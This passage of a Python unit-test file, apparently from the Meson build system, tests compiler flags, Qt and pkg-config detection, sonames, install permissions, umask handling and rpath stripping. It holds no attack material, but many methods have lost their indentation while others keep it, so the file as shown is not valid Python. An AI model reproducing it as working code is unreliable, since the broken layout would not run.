            elif each['file'].endswith('GLib.Thread.vala'):
                continue
            elif each['file'].endswith('retcode.c'):
                c_command = each['command']
            else:
                m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file'])
                raise AssertionError(m)
        self.assertIsNotNone(vala_command)
        self.assertIsNotNone(c_command)
        # -w suppresses all warnings, should be there in Vala but not in C
        self.assertIn(" -w ", vala_command)
        self.assertNotIn(" -w ", c_command)
        # -Wall enables all warnings, should be there in C but not in Vala
        self.assertNotIn(" -Wall ", vala_command)
        self.assertIn(" -Wall ", c_command)
        # -Werror converts warnings to errors, should always be there since it's
        # injected by an unrelated piece of code and the project has werror=true
        self.assertIn(" -Werror ", vala_command)
        self.assertIn(" -Werror ", c_command)
    @skipIfNoPkgconfig
    def test_qtdependency_pkgconfig_detection(self):
        '''
        Test that qt4 and qt5 detection with pkgconfig works.
        '''
        # Verify Qt4 or Qt5 can be found with pkg-config
        # (subprocess.call returns 0 when the package exists).
        qt4 = subprocess.call(['pkg-config', '--exists', 'QtCore'])
        qt5 = subprocess.call(['pkg-config', '--exists', 'Qt5Core'])
        testdir = os.path.join(self.framework_test_dir, '4 qt')
        self.init(testdir, extra_args=['-Dmethod=pkg-config'])
        # Confirm that the dependency was found with pkg-config
        mesonlog = self.get_meson_log()
        if qt4 == 0:
            self.assertRegex('\n'.join(mesonlog),
                             r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)\n')
        if qt5 == 0:
            self.assertRegex('\n'.join(mesonlog),
                             r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)\n')
@skip_if_not_base_option('b_sanitize')
def test_generate_gir_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
    def test_qt5dependency_qmake_detection(self):
        '''
        Test that qt5 detection with qmake works. This can't be an ordinary
        test case because it involves setting the environment.
        '''
        # Verify that qmake is for Qt5
        if not shutil.which('qmake-qt5'):
            if not shutil.which('qmake'):
                raise unittest.SkipTest('QMake not found')
            output = subprocess.getoutput('qmake --version')
            if 'Qt version 5' not in output:
                raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
        # Disable pkg-config codepath and force searching with qmake/qmake-qt5
        testdir = os.path.join(self.framework_test_dir, '4 qt')
        self.init(testdir, extra_args=['-Dmethod=qmake'])
        # Confirm that the dependency was found with qmake
        mesonlog = self.get_meson_log()
        self.assertRegex('\n'.join(mesonlog),
                         r'Run-time dependency qt5 \(modules: Core\) found: YES .* \((qmake|qmake-qt5)\)\n')
    def _test_soname_impl(self, libpath, install):
        '''
        Shared checks for soname/alias handling from the '1 soname' unit test.

        libpath: directory containing the built (or installed) libraries.
        install: if True, run the install step before checking.

        For each library flavour, verifies the on-disk file names, the
        symlink aliases and the SONAME reported by get_soname().
        '''
        if is_cygwin() or is_osx():
            raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames')
        testdir = os.path.join(self.unit_test_dir, '1 soname')
        self.init(testdir)
        self.build()
        if install:
            self.install()
        # File without aliases set.
        nover = os.path.join(libpath, 'libnover.so')
        self.assertPathExists(nover)
        self.assertFalse(os.path.islink(nover))
        self.assertEqual(get_soname(nover), 'libnover.so')
        # Only the single real file should match 'libnover*'.
        self.assertEqual(len(glob(nover[:-3] + '*')), 1)
        # File with version set
        verset = os.path.join(libpath, 'libverset.so')
        self.assertPathExists(verset + '.4.5.6')
        self.assertEqual(os.readlink(verset), 'libverset.so.4')
        self.assertEqual(get_soname(verset), 'libverset.so.4')
        # Real file plus two symlink aliases -> three matches.
        self.assertEqual(len(glob(verset[:-3] + '*')), 3)
        # File with soversion set
        soverset = os.path.join(libpath, 'libsoverset.so')
        self.assertPathExists(soverset + '.1.2.3')
        self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3')
        self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3')
        self.assertEqual(len(glob(soverset[:-3] + '*')), 2)
        # File with version and soversion set to same values
        settosame = os.path.join(libpath, 'libsettosame.so')
        self.assertPathExists(settosame + '.7.8.9')
        self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9')
        self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9')
        self.assertEqual(len(glob(settosame[:-3] + '*')), 2)
        # File with version and soversion set to different values
        bothset = os.path.join(libpath, 'libbothset.so')
        self.assertPathExists(bothset + '.1.2.3')
        self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3')
        self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6')
        self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3')
        self.assertEqual(len(glob(bothset[:-3] + '*')), 3)
def test_soname(self):
self._test_soname_impl(self.builddir, False)
def test_installed_soname(self):
libdir = self.installdir + os.path.join(self.prefix, self.libdir)
self._test_soname_impl(libdir, True)
    def test_compiler_check_flags_order(self):
        '''
        Test that compiler check flags override all other flags. This can't be
        an ordinary test case because it needs the environment to be set.
        '''
        testdir = os.path.join(self.common_test_dir, '39 has function')
        env = get_fake_env(testdir, self.builddir, self.prefix)
        cpp = env.detect_cpp_compiler(MachineChoice.HOST)
        Oflag = '-O3'
        OflagCPP = Oflag
        if cpp.get_id() in ('clang', 'gcc'):
            # prevent developers from adding "int main(int argc, char **argv)"
            # to small Meson checks unless these parameters are actually used
            OflagCPP += ' -Werror=unused-parameter'
        # Inject the optimization flags via the environment, then confirm the
        # compiler checks still end with Meson's own -O0 (which wins).
        env = {'CFLAGS': Oflag,
               'CXXFLAGS': OflagCPP}
        self.init(testdir, override_envvars=env)
        cmds = self.get_meson_log_compiler_checks()
        for cmd in cmds:
            # Strip any ccache prefix so the positional check below lines up.
            if cmd[0] == 'ccache':
                cmd = cmd[1:]
            # Verify that -I flags from the `args` kwarg are first
            # This is set in the '39 has function' test case
            self.assertEqual(cmd[1], '-I/tmp')
            # Verify that -O3 set via the environment is overridden by -O0
            Oargs = [arg for arg in cmd if arg.startswith('-O')]
            self.assertEqual(Oargs, [Oflag, '-O0'])
    def _test_stds_impl(self, testdir, compiler, p: str):
        '''
        Configure *testdir* once for every language standard the compiler
        claims to support and verify the -std= flag reaches the command line,
        then check that an invalid -std= from the environment fails configure.

        p: language prefix used for the option name, 'c' or 'cpp'.
        '''
        lang_std = p + '_std'
        # Gate newer standards on compiler id/version; for unknown compilers
        # we optimistically assume everything listed is supported.
        has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or
                     compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or
                     compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0'))
        has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or
                         compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or
                         compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
        has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or
                   compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or
                   compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
        # Check that all the listed -std=xxx options for this compiler work just fine when used
        # https://en.wikipedia.org/wiki/Xcode#Latest_versions
        # https://www.gnu.org/software/gcc/projects/cxx-status.html
        for v in compiler.get_options()[lang_std].choices:
            # we do it like this to handle gnu++17,c++17 and gnu17,c17 cleanly
            # thus, C++ first
            if '++17' in v and not has_cpp17:
                continue
            elif '++2a' in v and not has_cpp2a_c17: # https://en.cppreference.com/w/cpp/compiler_support
                continue
            # now C
            elif '17' in v and not has_cpp2a_c17:
                continue
            elif '18' in v and not has_c18:
                continue
            std_opt = '{}={}'.format(lang_std, v)
            self.init(testdir, extra_args=['-D' + std_opt])
            cmd = self.get_compdb()[0]['command']
            # c++03 and gnu++03 are not understood by ICC, don't try to look for them
            skiplist = frozenset([
                ('intel', 'c++03'),
                ('intel', 'gnu++03')])
            # 'none' emits no -std flag at all, so there is nothing to assert.
            if v != 'none' and not (compiler.get_id(), v) in skiplist:
                cmd_std = " -std={} ".format(v)
                self.assertIn(cmd_std, cmd)
            try:
                self.build()
            except Exception:
                print('{} was {!r}'.format(lang_std, v))
                raise
            self.wipe()
        # Check that an invalid std option in CFLAGS/CPPFLAGS fails
        # Needed because by default ICC ignores invalid options
        cmd_std = '-std=FAIL'
        if p == 'c':
            env_flag_name = 'CFLAGS'
        elif p == 'cpp':
            env_flag_name = 'CXXFLAGS'
        else:
            raise NotImplementedError('Language {} not defined.'.format(p))
        env = {}
        env[env_flag_name] = cmd_std
        with self.assertRaises((subprocess.CalledProcessError, mesonbuild.mesonlib.EnvironmentException),
                               msg='C compiler should have failed with -std=FAIL'):
            self.init(testdir, override_envvars = env)
            # ICC won't fail in the above because additional flags are needed to
            # make unknown -std=... options errors.
            self.build()
def test_compiler_c_stds(self):
'''
Test that C stds specified for this compiler can all be used. Can't be
an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cc, 'c')
def test_compiler_cpp_stds(self):
'''
Test that C++ stds specified for this compiler can all be used. Can't
be an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '2 cpp')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cpp, 'cpp')
def test_unity_subproj(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir, extra_args='--unity=subprojects')
simpletest_id = Target.construct_id_from_path('subprojects/sublib', 'simpletest', '@exe')
self.assertPathExists(os.path.join(self.builddir, 'subprojects/sublib', simpletest_id, 'simpletest-unity.c'))
sublib_id = Target.construct_id_from_path('subprojects/sublib', 'sublib', '@sha')
self.assertPathExists(os.path.join(self.builddir, 'subprojects/sublib', sublib_id, 'sublib-unity.c'))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c'))
self.build()
    def test_installed_modes(self):
        '''
        Test that files installed by these tests have the correct permissions.
        Can't be an ordinary test because our installed_files.txt is very basic.
        '''
        # Test file modes
        testdir = os.path.join(self.common_test_dir, '12 data')
        self.init(testdir)
        self.install()
        f = os.path.join(self.installdir, 'etc', 'etcfile.dat')
        found_mode = stat.filemode(os.stat(f).st_mode)
        want_mode = 'rw------T'
        # filemode()[0] is the file-type character; compare permissions only.
        self.assertEqual(want_mode, found_mode[1:])
        f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh')
        statf = os.stat(f)
        found_mode = stat.filemode(statf.st_mode)
        want_mode = 'rwxr-sr-x'
        self.assertEqual(want_mode, found_mode[1:])
        if os.getuid() == 0:
            # The chown failed nonfatally if we're not root
            self.assertEqual(0, statf.st_uid)
            self.assertEqual(0, statf.st_gid)
        f = os.path.join(self.installdir, 'usr', 'share', 'progname',
                         'fileobject_datafile.dat')
        orig = os.path.join(testdir, 'fileobject_datafile.dat')
        statf = os.stat(f)
        statorig = os.stat(orig)
        found_mode = stat.filemode(statf.st_mode)
        orig_mode = stat.filemode(statorig.st_mode)
        # With no install_mode given the source file's permissions are kept.
        self.assertEqual(orig_mode[1:], found_mode[1:])
        self.assertEqual(os.getuid(), statf.st_uid)
        if os.getuid() == 0:
            # The chown failed nonfatally if we're not root
            self.assertEqual(0, statf.st_gid)
        self.wipe()
        # Test directory modes
        testdir = os.path.join(self.common_test_dir, '62 install subdir')
        self.init(testdir)
        self.install()
        f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat')
        statf = os.stat(f)
        found_mode = stat.filemode(statf.st_mode)
        want_mode = 'rwxr-x--t'
        self.assertEqual(want_mode, found_mode[1:])
        if os.getuid() == 0:
            # The chown failed nonfatally if we're not root
            self.assertEqual(0, statf.st_uid)
    def test_installed_modes_extended(self):
        '''
        Test that files are installed with correct permissions using install_mode.
        '''
        testdir = os.path.join(self.common_test_dir, '195 install_mode')
        self.init(testdir)
        self.build()
        self.install()
        # Each entry is (path relative to the usr prefix, full filemode string
        # including the leading file-type character).
        for fsobj, want_mode in [
                ('bin', 'drwxr-x---'),
                ('bin/runscript.sh', '-rwxr-sr-x'),
                ('bin/trivialprog', '-rwxr-sr-x'),
                ('include', 'drwxr-x---'),
                ('include/config.h', '-rw-rwSr--'),
                ('include/rootdir.h', '-r--r--r-T'),
                ('lib', 'drwxr-x---'),
                ('lib/libstat.a', '-rw---Sr--'),
                ('share', 'drwxr-x---'),
                ('share/man', 'drwxr-x---'),
                ('share/man/man1', 'drwxr-x---'),
                ('share/man/man1/foo.1', '-r--r--r-T'),
                ('share/sub1', 'drwxr-x---'),
                ('share/sub1/second.dat', '-rwxr-x--t'),
                ('subdir', 'drwxr-x---'),
                ('subdir/data.dat', '-rw-rwSr--'),
        ]:
            f = os.path.join(self.installdir, 'usr', *fsobj.split('/'))
            found_mode = stat.filemode(os.stat(f).st_mode)
            self.assertEqual(want_mode, found_mode,
                             msg=('Expected file %s to have mode %s but found %s instead.' %
                                  (fsobj, want_mode, found_mode)))
        # Ensure that introspect --installed works on all types of files
        # FIXME: also verify the files list
        self.introspect('--installed')
    def test_install_umask(self):
        '''
        Test that files are installed with correct permissions using default
        install umask of 022, regardless of the umask at time the worktree
        was checked out or the build was executed.
        '''
        # Copy source tree to a temporary directory and change permissions
        # there to simulate a checkout with umask 002.
        orig_testdir = os.path.join(self.unit_test_dir, '26 install umask')
        # Create a new testdir under tmpdir.
        tmpdir = os.path.realpath(tempfile.mkdtemp())
        self.addCleanup(windows_proof_rmtree, tmpdir)
        testdir = os.path.join(tmpdir, '26 install umask')
        # Copy the tree using shutil.copyfile, which will use the current umask
        # instead of preserving permissions of the old tree.
        save_umask = os.umask(0o002)
        self.addCleanup(os.umask, save_umask)
        shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile)
        # Preserve the executable status of subdir/sayhello though.
        os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775)
        self.init(testdir)
        # Run the build under a 027 umask now.
        os.umask(0o027)
        self.build()
        # And keep umask 027 for the install step too.
        self.install()
        # Regardless of the 002/027 umasks used above, installed files must
        # reflect the default install umask of 022.
        for executable in [
                'bin/prog',
                'share/subdir/sayhello',
        ]:
            f = os.path.join(self.installdir, 'usr', *executable.split('/'))
            found_mode = stat.filemode(os.stat(f).st_mode)
            want_mode = '-rwxr-xr-x'
            self.assertEqual(want_mode, found_mode,
                             msg=('Expected file %s to have mode %s but found %s instead.' %
                                  (executable, want_mode, found_mode)))
        for directory in [
                'usr',
                'usr/bin',
                'usr/include',
                'usr/share',
                'usr/share/man',
                'usr/share/man/man1',
                'usr/share/subdir',
        ]:
            f = os.path.join(self.installdir, *directory.split('/'))
            found_mode = stat.filemode(os.stat(f).st_mode)
            want_mode = 'drwxr-xr-x'
            self.assertEqual(want_mode, found_mode,
                             msg=('Expected directory %s to have mode %s but found %s instead.' %
                                  (directory, want_mode, found_mode)))
        for datafile in [
                'include/sample.h',
                'share/datafile.cat',
                'share/file.dat',
                'share/man/man1/prog.1',
                'share/subdir/datafile.dog',
        ]:
            f = os.path.join(self.installdir, 'usr', *datafile.split('/'))
            found_mode = stat.filemode(os.stat(f).st_mode)
            want_mode = '-rw-r--r--'
            self.assertEqual(want_mode, found_mode,
                             msg=('Expected file %s to have mode %s but found %s instead.' %
                                  (datafile, want_mode, found_mode)))
    def test_cpp_std_override(self):
        # Per-target cpp_std overrides: prog98 must compile as c++98,
        # prog11 as c++11, and progp with the project default (no override).
        testdir = os.path.join(self.unit_test_dir, '6 std override')
        self.init(testdir)
        compdb = self.get_compdb()
        # Don't try to use -std=c++03 as a check for the
        # presence of a compiler flag, as ICC does not
        # support it.
        for i in compdb:
            if 'prog98' in i['file']:
                c98_comp = i['command']
            if 'prog11' in i['file']:
                c11_comp = i['command']
            if 'progp' in i['file']:
                plain_comp = i['command']
        # NOTE(review): if any of the three sources is missing from the
        # compilation database the names above are unbound and the asserts
        # raise NameError instead of a clean assertion failure.
        self.assertNotEqual(len(plain_comp), 0)
        self.assertIn('-std=c++98', c98_comp)
        self.assertNotIn('-std=c++11', c98_comp)
        self.assertIn('-std=c++11', c11_comp)
        self.assertNotIn('-std=c++98', c11_comp)
        self.assertNotIn('-std=c++98', plain_comp)
        self.assertNotIn('-std=c++11', plain_comp)
        # Now werror
        self.assertIn('-Werror', plain_comp)
        self.assertNotIn('-Werror', c98_comp)
    def test_run_installed(self):
        # Installed binaries must not retain a build-dir rpath: the program
        # should fail to run until LD_LIBRARY_PATH points at the installed lib.
        if is_cygwin() or is_osx():
            raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable')
        testdir = os.path.join(self.unit_test_dir, '7 run installed')
        self.init(testdir)
        self.build()
        self.install()
        installed_exe = os.path.join(self.installdir, 'usr/bin/prog')
        installed_libdir = os.path.join(self.installdir, 'usr/foo')
        installed_lib = os.path.join(installed_libdir, 'libfoo.so')
        self.assertTrue(os.path.isfile(installed_exe))
        self.assertTrue(os.path.isdir(installed_libdir))
        self.assertTrue(os.path.isfile(installed_lib))
        # Must fail when run without LD_LIBRARY_PATH to ensure that
        # rpath has been properly stripped rather than pointing to the builddir.
        self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0)
        # When LD_LIBRARY_PATH is set it should start working.
        # For some reason setting LD_LIBRARY_PATH in os.environ fails
        # when all tests are run (but works when only this test is run),
        # but doing this explicitly works.
        env = os.environ.copy()
        env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')])
        self.assertEqual(subprocess.call(installed_exe, env=env), 0)
        # Ensure that introspect --installed works
        installed = self.introspect('--installed')
        for v in installed.values():
            self.assertTrue('prog' in v or 'foo' in v)
    @skipIfNoPkgconfig
    def test_order_of_l_arguments(self):
        # Relative order of -L and -l flags from the .pc file must be kept
        # in the generated link command line.
        testdir = os.path.join(self.unit_test_dir, '8 -L -l order')
        self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
        # NOTE: .pc file has -Lfoo -lfoo -Lbar -lbar but pkg-config reorders
        # the flags before returning them to -Lfoo -Lbar -lfoo -lbar
        # but pkgconf seems to not do that. Sigh. Support both.
        expected_order = [('-L/me/first', '-lfoo1'),
                          ('-L/me/second', '-lfoo2'),
                          ('-L/me/first', '-L/me/second'),
                          ('-lfoo1', '-lfoo2'),
                          ('-L/me/second', '-L/me/third'),
                          ('-L/me/third', '-L/me/fourth',),
                          ('-L/me/third', '-lfoo3'),
                          ('-L/me/fourth', '-lfoo4'),
                          ('-lfoo3', '-lfoo4'),
                          ]
        with open(os.path.join(self.builddir, 'build.ninja')) as ifile:
            for line in ifile:
                if expected_order[0][0] in line:
                    # Each pair (first, second) must appear in that order.
                    for first, second in expected_order:
                        self.assertLess(line.index(first), line.index(second))
                    return
        raise RuntimeError('Linker entries not found in the Ninja file.')
def test_introspect_dependencies(self):
'''
Tests that mesonintrospect --dependencies returns expected output.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir)
glib_found = False
gobject_found = False
deps = self.introspect('--dependencies')
self.assertIsInstance(deps, list)
for dep in deps:
self.assertIsInstance(dep, dict)
self.assertIn('name', dep)
self.assertIn('compile_args', dep)
self.assertIn('link_args', dep)
if dep['name'] == 'glib-2.0':
glib_found = True
elif dep['name'] == 'gobject-2.0':
gobject_found = True
self.assertTrue(glib_found)
self.assertTrue(gobject_found)
if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0:
raise unittest.SkipTest('glib >= 2.56.2 needed for the rest')
targets = self.introspect('--targets')
docbook_target = None
for t in targets:
if t['name'] == 'generated-gdbus-docbook':
docbook_target = t
break
self.assertIsInstance(docbook_target, dict)
self.assertEqual(os.path.basename(t['filename'][0]), 'generated-gdbus-doc-' + os.path.basename(t['target_sources'][0]['sources'][0]))
    def test_build_rpath(self):
        # build_rpath must be present in the build tree and replaced by
        # install_rpath on install.
        if is_cygwin():
            raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
        testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
        self.init(testdir)
        self.build()
        # C program RPATH
        build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
        self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
        self.install()
        install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
        self.assertEqual(install_rpath, '/baz')
        # C++ program RPATH
        build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
        self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
        self.install()
        install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
        # NOTE(review): the C binary expects '/baz' above but the C++ one
        # expects 'baz' — presumably mirroring different install_rpath values
        # in the test's meson.build; confirm the asymmetry is intentional.
        self.assertEqual(install_rpath, 'baz')
@skip_if_not_base_option('b_sanitize')
def test_pch_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.common_test_dir, '13 pch')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
compdb = self.get_compdb()
for i in compdb:
self.assertIn("-fsanitize=address", i["command"])
def test_coverage(self):
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found')
if not shutil.which('genhtml') and not gcovr_new_rootdir:
raise unittest.SkipTest('genhtml not found and gcovr is too old')
if 'clang' in os.environ.get('CC', ''):
# We need to use llvm-cov instead of gcovr with clang
raise unittest.SkipTest('Coverage does not work with clang right now, help wanted!')
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-html')
def test_cross_find_program(self):
testdir = os.path.join(self.unit_test_dir, '11 cross prog')
crossfile = tempfile.NamedTemporaryFile(mode='w')
print(os.path.join(testdir, 'some_cross_tool.py'))
crossfile.write(textwrap.dedent('''\
[binaries]
c = '/usr/bin/{1}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
sometool.py = ['{0}']
someothertool.py = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7' # Not sure if correct.
endian = 'little'
''').format(os.path.join(testdir, 'some_cross_tool.py'),
'gcc' if is_sunos() else 'cc'))
crossfile.flush()
self.meson_cross_file = crossfile.name
self.init(testdir)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '13 reconfigure')
self.init(testdir, extra_args=['-Db_coverage=true'], default_args=False)
self.build('reconfigure')
def test_vala_generated_source_buildir_inside_source_tree(self):
'''
Test that valac outputs generated C files in the expected location when
the builddir is a subdir of the source tree.
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '8 generated sources')
newdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, newdir)
testdir = newdir
# New builddir
builddir = os.path.join(testdir, 'subdir/_build')
os.makedirs(builddir, exist_ok=True)
self.change_builddir(builddir)
self.init(testdir)
self.build()
    def test_old_gnome_module_codepaths(self):
        '''
        A lot of code in the GNOME module is conditional on the version of the
        glib tools that are installed, and breakages in the old code can slip
        by once the CI has a newer glib version. So we force the GNOME module
        to pretend that it's running on an ancient glib so the fallback code is
        also tested.
        '''
        testdir = os.path.join(self.framework_test_dir, '7 gnome')
        # Patch the module-level version; the finally block below restores it
        # even if configure/build fails.
        mesonbuild.modules.gnome.native_glib_version = '2.20'
        env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"}
        try:
            self.init(testdir,
                      inprocess=True,
                      override_envvars=env)
            self.build(override_envvars=env)
        finally:
            mesonbuild.modules.gnome.native_glib_version = None
    @skipIfNoPkgconfig
    def test_pkgconfig_usage(self):
        # Install a library with a generated .pc file into a temp prefix and
        # verify a dependent project can find and use it via PKG_CONFIG_PATH,
        # without internal libraries or private deps leaking out.
        testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependency')
        testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee')
        if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'],
                           stdout=subprocess.DEVNULL,
                           stderr=subprocess.DEVNULL) != 0:
            raise unittest.SkipTest('Glib 2.0 dependency not available.')
        with tempfile.TemporaryDirectory() as tempdirname:
            self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False)
            self.install(use_destdir=False)
            shutil.rmtree(self.builddir)
            os.mkdir(self.builddir)
            pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
            self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc')))
            lib_dir = os.path.join(tempdirname, 'lib')
            myenv = os.environ.copy()
            myenv['PKG_CONFIG_PATH'] = pkg_dir
            # Private internal libraries must not leak out.
            pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv)
            self.assertFalse(b'libpkgdep-int' in pkg_out, 'Internal library leaked out.')
            # Dependencies must not leak to cflags when building only a shared library.
            pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv)
            self.assertFalse(b'glib' in pkg_out, 'Internal dependency leaked to headers.')
            # Test that the result is usable.
            self.init(testdir2, override_envvars=myenv)
            self.build(override_envvars=myenv)
            myenv = os.environ.copy()
            myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')])
            if is_cygwin():
                bin_dir = os.path.join(tempdirname, 'bin')
                myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH']
            self.assertTrue(os.path.isdir(lib_dir))
            test_exe = os.path.join(self.builddir, 'pkguser')
            self.assertTrue(os.path.isfile(test_exe))
            # The built consumer must run against the installed library.
            subprocess.check_call(test_exe, env=myenv)
    @skipIfNoPkgconfig
    def test_pkgconfig_relative_paths(self):
        # A .pc file using relative -L paths must resolve to usable link args.
        testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths')
        pkg_dir = os.path.join(testdir, 'pkgconfig')
        self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc')))
        env = get_fake_env(testdir, self.builddir, self.prefix)
        env.coredata.set_options({'pkg_config_path': pkg_dir}, subproject='')
        kwargs = {'required': True, 'silent': True}
        relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs)
        self.assertTrue(relative_path_dep.found())
        # Ensure link_args are properly quoted
        libpath = Path(self.builddir) / '../relativepath/lib'
        link_args = ['-L' + libpath.as_posix(), '-lrelativepath']
        self.assertEqual(relative_path_dep.get_link_args(), link_args)
    @skipIfNoPkgconfig
    def test_pkgconfig_internal_libraries(self):
        '''
        Install a static library into a temporary prefix, then build an app
        that consumes it purely through the generated pkg-config file,
        with only PKG_CONFIG_PATH pointing at the installed .pc directory.
        '''
        with tempfile.TemporaryDirectory() as tempdirname:
            # build library
            testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries')
            testdirlib = os.path.join(testdirbase, 'lib')
            self.init(testdirlib, extra_args=['--prefix=' + tempdirname,
                                              '--libdir=lib',
                                              '--default-library=static'], default_args=False)
            self.build()
            self.install(use_destdir=False)
            # build user of library
            pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
            self.new_builddir()
            self.init(os.path.join(testdirbase, 'app'),
                      override_envvars={'PKG_CONFIG_PATH': pkg_dir})
            self.build()
    @skipIfNoPkgconfig
    def test_static_archive_stripping(self):
        '''
        Check that Meson produces valid static archives with --strip enabled
        '''
        with tempfile.TemporaryDirectory() as tempdirname:
            testdirbase = os.path.join(self.unit_test_dir, '67 static archive stripping')
            # build lib
            self.new_builddir()
            testdirlib = os.path.join(testdirbase, 'lib')
            testlibprefix = os.path.join(tempdirname, 'libprefix')
            self.init(testdirlib, extra_args=['--prefix=' + testlibprefix,
                                              '--libdir=lib',
                                              '--default-library=static',
                                              '--buildtype=debug',
                                              '--strip'], default_args=False)
            self.build()
            self.install(use_destdir=False)
            # build executable (uses lib, fails if static archive has been stripped incorrectly)
            pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig')
            self.new_builddir()
            self.init(os.path.join(testdirbase, 'app'),
                      override_envvars={'PKG_CONFIG_PATH': pkg_dir})
            self.build()
@skipIfNoPkgconfig
def test_pkgconfig_formatting(self):
testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv)
deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething']
if is_windows() or is_cygwin() or is_osx() or is_openbsd():
# On Windows, libintl is a separate library
deps.append(b'-lintl')
self.assertEqual(set(deps), set(stdo.split()))
@skipIfNoPkgconfig
@skip_if_not_language('cs')
def test_pkgconfig_csharp_library(self):
testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip())
